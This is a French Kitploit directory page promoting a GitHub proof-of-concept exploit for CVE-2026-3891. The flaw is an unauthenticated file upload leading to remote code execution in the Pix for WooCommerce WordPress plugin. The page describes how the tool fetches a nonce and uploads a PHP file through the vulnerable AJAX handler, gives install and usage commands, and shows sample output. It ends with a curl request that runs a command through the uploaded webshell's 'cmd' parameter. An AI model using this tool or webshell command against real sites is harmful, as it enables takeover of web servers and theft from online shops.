Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-3891-Pix-for-WooCommerce-Plugin-Exploit — PoC pour CVE-2026-3891 — Téléversement arbitraire de fichiers sans authentification menant à une exécution de code à distance dans Pix for WooCommerce <= 1.5.0 | Kitploit
Outils/GitHubGitHub/m4sh-wacker/cve-2026-3891-pix-for-woocommerce-plugin-exploit
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'Intrusion
GitHubm4sh-wacker/cve-2026-3891-pix-for-woocommerce-plugin-exploit

CVE-2026-3891-Pix-for-WooCommerce-Plugin-Exploit

PoC pour CVE-2026-3891 — Téléversement arbitraire de fichiers sans authentification menant à une exécution de code à distance dans Pix for WooCommerce <= 1.5.0

Voir le dépôt
2021il y a 1 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-3891-Pix-for-WooCommerce-Plugin-Exploit

🛡️ Description

CVE-2026-3891 est une vulnérabilité critique de téléversement arbitraire de fichier sans authentification présente dans le plugin WordPress Pix for WooCommerce dans les versions jusqu'à la 1.5.0 incluse.

La vulnérabilité existe dans la fonctionnalité lkn_pix_for_woocommerce_c6_save_settings en raison de l'absence de contrôles d'autorisation et d'une validation insuffisante du type de fichier. L'exploit automatise le processus d'obtention d'un nonce valide et de démonstration du téléversement sans restriction d'un fichier PHP vers un répertoire accessible via le web.

En exploitant cette vulnérabilité, un attaquant non authentifié peut être en mesure de :

  • Téléverser des fichiers arbitraires sans s'authentifier auprès de WordPress.
  • Téléverser des fichiers avec des extensions dangereuses en raison d'une validation insuffisante du type de fichier.
  • Accéder aux fichiers téléversés directement via un répertoire de plugin accessible via le web.
  • Atteindre une exécution de code à distance (RCE) lorsque les fichiers PHP téléversés sont exécutés par le serveur web affecté.

🚀 Fonctionnalités

  • Flux d'exploitation non authentifié : Ne nécessite pas d'identifiants utilisateur WordPress valides.
  • Récupération automatique du nonce : Obtient et extrait automatiquement le nonce requis.
  • Téléversement de fichier automatisé : Envoie la requête de téléversement multipart requise au gestionnaire AJAX vulnérable.
  • Génération directe d'URL : Affiche l'URL finale du fichier de preuve de concept téléversé.
  • Sortie CLI épurée : Fournit une interface en ligne de commande simple et colorisée.

  • 🛠️ Installation et prérequis

    1. Prérequis : Installez Python 3.
    2. Installer Requests :
    root@kitploit:~
    pip install requests
    
    1. Cloner/Télécharger : Enregistrez le fichier CVE-2026-3891.py sur votre système.

    💻 Utilisation

    root@kitploit:~
    python CVE-2026-3891.py
    

    Saisissez l'URL WordPress cible lorsque vous y êtes invité :

    root@kitploit:~
    [?] Enter target URL: http://localhost/wordpress
    

    Exemple :

    root@kitploit:~
    [*] Requesting nonce...
    [+] Nonce obtained: **********
    [*] Uploading woocommerce.php...
    
    [+] File uploaded successfully!
    [+] URL: http://target/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/woocommerce.php
    
    root@kitploit:~
    
    curl http://target/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/woocommerce.php?cmd=ls
    
    

    image

    Télécharger l’outil